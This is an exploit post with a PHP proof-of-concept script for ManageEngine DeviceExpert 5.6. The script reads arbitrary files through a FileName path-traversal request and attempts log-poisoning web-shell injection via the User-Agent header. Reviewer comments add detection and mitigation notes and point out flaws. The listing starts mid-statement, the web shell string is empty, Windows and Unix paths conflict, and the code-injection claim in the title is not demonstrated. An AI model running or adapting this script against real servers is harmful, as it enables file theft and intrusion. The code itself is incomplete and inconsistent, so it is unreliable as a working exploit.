=============================================================================================================================================
| # Title : ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.manageengine.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Web Shell injection if the target has an LFI (Local File Inclusion) vulnerability with code execution capability, or RFI (Remote File Inclusion), or if we can write to a path that the web server can execute, such as the uploads or webroot folder on the server. ( https://packetstorm.news/files/id/181161/ )
[+] save code as poc.php.
[+] Set Target : line 81
[+] USage : php poc.php
[+] PayLoad :

        // NOTE(review): the listing starts mid-statement. The opening PHP tag, the class
        // declaration and the constructor signature are missing from this copy. The call at
        // the bottom passes only a host, so port, ssl and filepath presumably have defaults
        // that are not visible here.
        host = $host;
        $this->port = $port;
        $this->ssl = $ssl;
        $this->filepath = $filepath;
    }

    /**
     * Sends one HTTP(S) request to the configured host and port and returns its outcome.
     *
     * No request method is set, so curl issues a GET. The scheme is chosen from $this->ssl.
     *
     * @param string $uri     Path and query string appended directly after host:port.
     * @param array  $headers Header lines handed to CURLOPT_HTTPHEADER.
     * @return array Two elements: the HTTP status code and the body returned by curl_exec().
     */
    private function sendRequest($uri, $headers = [])
    {
        $protocol = $this->ssl ? 'https' : 'http';
        $url = "$protocol://{$this->host}:{$this->port}$uri";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        // Return the body as a string instead of printing it.
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 25);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return [$http_code, $response];
    }

    /**
     * Probes /scheduleresult.de and, when it answers 200, requests the same path with a
     * FileName value made of ten "..\" segments followed by the configured file path.
     * A non-empty 200 body is passed to saveFile().
     *
     * NOTE(review): the response is handled as file contents to store, which is a
     * path-traversal file read through the FileName parameter. Nothing in this method shows
     * server-side code execution, so the "PHP Code Injection" wording of the title is not
     * demonstrated by this step; triage it as arbitrary file disclosure unless shown otherwise.
     *
     * Detection: in web server or proxy logs, flag requests to /scheduleresult.de whose
     * FileName parameter contains "..\" or "../" sequences, raw or URL-encoded.
     * Mitigation: keep the management interface off untrusted networks, run a vendor-fixed
     * release, and have the handler canonicalise FileName and reject anything that resolves
     * outside the directory it is meant to serve.
     */
    public function run()
    {
        $traverse = str_repeat("..\\", 10);
        $filename = $this->filepath;
        // Fingerprint step: any status other than 200 on the base path ends the run.
        list($code, $response) = $this->sendRequest("/scheduleresult.de");
        if ($code !== 200) {
            echo "[ERROR] Target is not ManageEngine DeviceExpert\n";
            return;
        }
        // The traversal string and file path are interpolated as-is, without URL-encoding.
        list($code, $response) = $this->sendRequest("/scheduleresult.de/?FileName={$traverse}{$filename}");
        if ($code === 200) {
            echo "[SUCCESS] {$this->host}:{$this->port} returns: $code\n";
            if (!empty($response)) {
                $this->saveFile($response);
            } else {
                echo "[ERROR] {$this->host}:{$this->port} - no file downloaded (empty)\n";
            }
        } elseif ($code === 404) {
            echo "[ERROR] {$this->host}:{$this->port} - file not found\n";
        } else {
            echo "[ERROR] Unable to communicate with {$this->host}:{$this->port}\n";
        }
    }

    /**
     * Writes the given response body into the directory of this script.
     *
     * The file name is the base name of the configured path; basename() drops directory
     * components, so the write stays inside __DIR__. The content comes from the remote
     * server and should be handled as untrusted data by whoever opens it.
     *
     * @param string $content Response body to store.
     */
    private function saveFile($content)
    {
        $filename = basename($this->filepath);
        $path = __DIR__ . "/$filename";
        file_put_contents($path, $content);
        echo "[SUCCESS] File saved in: $path\n";
    }

    /**
     * Sends a request to /scheduleresult.de with $webshell as the User-Agent header and
     * prints a follow-up URL whose FileName points at an Apache access log.
     *
     * NOTE(review): $webshell is an empty string in this copy. The 200 check only shows that
     * the request was answered; it does not show that anything was logged, included or
     * executed. The printed log path is a Unix path, while run() builds its traversal from
     * backslash segments, so the two steps do not describe the same target layout.
     *
     * Detection: User-Agent values carrying script or code markers, and requests whose
     * FileName parameter resolves to a log file.
     * Mitigation: as for run(); in addition, log files should never be reachable through a
     * handler that interprets their content.
     */
    public function injectWebShell()
    {
        $webshell = "";
        $headers = ["User-Agent: " . $webshell];
        list($code, $response) = $this->sendRequest("/scheduleresult.de", $headers);
        if ($code === 200) {
            echo "[SUCCESS] Web Shell injected via User-Agent!\n";
            echo "Access it at: http://{$this->host}/scheduleresult.de/?FileName=../../../../../../var/log/apache2/access.log&cmd=id\n";
        } else {
            echo "[ERROR] Web Shell injection failed!\n";
        }
    }
}

// 'target_ip_here' is a placeholder host; both steps run unconditionally, one after the other.
$scanner = new ManageEngineScanner('target_ip_here');
$scanner->run();
$scanner->injectWebShell();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================